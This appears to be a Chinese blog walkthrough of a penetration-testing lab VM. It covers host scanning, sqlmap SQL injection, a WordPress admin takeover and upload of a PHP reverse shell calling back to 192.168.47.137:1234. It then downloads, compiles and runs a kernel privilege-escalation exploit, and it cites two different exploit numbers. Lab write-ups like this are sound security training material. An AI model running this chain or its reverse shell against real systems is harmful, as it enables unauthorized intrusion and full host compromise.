首先进行主机探测
fping -asg 192.168.47.0/24
nmap -sV -min--rate 10000 192.168.47.0/24扫描到IP地址为192.168.47.146的新主机,仅有一个80端口,22端口的ssh并没有开启
点击Uncategorized发现到了URL中以get参数提交的字符,怀疑到了SQL注入,我们在页面上加个单引号尝试报错,发现报错后直接使用sqlmap跑出数据库
看到有一列叫做user_level,应该是用户等级,可能是等级越高权限越高,所以使用GeorgeMiller用户登陆,到WP默认的登陆页面中进行登录http://url/wp_login,获取到后台权限,尝试寻找上传木马或者命令执行的模块。 发现了OPTION模块的左上角有一个Allow File Upload,允许文件上传的勾选框,并且可以设置可上传文件的类型,添加php文件后缀。 
点击Update Options后发现模块中多了一个upload模块,进入发现可以直接进行文件上传
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.47.137/1234 0>&1'"); ?> 找了很多方式后并没有可以提权的漏洞,尝试一下内核提权
searchsploit linux kernel 2.6.3 | grep 'Privilege Escalation'
看到中间几个2.6.3版本的内核提权,决定使用编号为12585的提权方式,将C语言文件复制到当前工作目录下,并且开启http服务
searchsploit linux kernel -m 15285.c
python -m http.server 8888在获得到的shell中进入tmp目录下并且使用wget 下载15285.c文件
gcc 15285.c -o 15285 编译
./15285 运行
39
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
